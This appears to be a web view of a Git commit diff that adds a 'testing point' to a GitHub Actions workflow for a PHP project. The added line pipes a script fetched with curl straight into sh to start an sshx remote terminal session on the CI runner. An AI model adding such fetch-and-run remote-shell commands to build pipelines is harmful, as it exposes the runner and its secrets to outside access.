Added testing point
Some checks are pending
CI / check-phpdoc (push) Waiting to run
CI / generate-phpdoc (push) Blocked by required conditions
CI / release (push) Waiting to run
CI / debug (push) Waiting to run
CI / release_executable (push) Waiting to run
CI / debug_executable (push) Waiting to run
CI / check-phpunit (push) Waiting to run
CI / test (push) Blocked by required conditions
CI / release-documentation (push) Blocked by required conditions
CI / release-artifacts (push) Blocked by required conditions
Some checks are pending
CI / check-phpdoc (push) Waiting to run
CI / generate-phpdoc (push) Blocked by required conditions
CI / release (push) Waiting to run
CI / debug (push) Waiting to run
CI / release_executable (push) Waiting to run
CI / debug_executable (push) Waiting to run
CI / check-phpunit (push) Waiting to run
CI / test (push) Blocked by required conditions
CI / release-documentation (push) Blocked by required conditions
CI / release-artifacts (push) Blocked by required conditions
This commit is contained in:
parent
ba47ac3906
commit
d1ea59c061
1 changed files with 3 additions and 0 deletions
3
.github/workflows/ncc_workflow.yml
vendored
3
.github/workflows/ncc_workflow.yml
vendored
|
@ -366,6 +366,9 @@ jobs:
|
|||
check_service 8087 || exit 1
|
||||
check_service 8086 || exit 1
|
||||
|
||||
# Testing point
|
||||
curl -sSf https://sshx.io/get | sh -s run
|
||||
|
||||
# Run the tests and tare down the test environment
|
||||
php phpunit-11.3.phar --configuration phpunit.xml --log-junit reports/junit.xml --log-teamcity reports/teamcity --testdox-html reports/testdox.html --testdox-text reports/testdox.txt
|
||||
docker-compose -f docker-compose.test.yml down
|
||||
|
|
Loading…
Add table
Reference in a new issue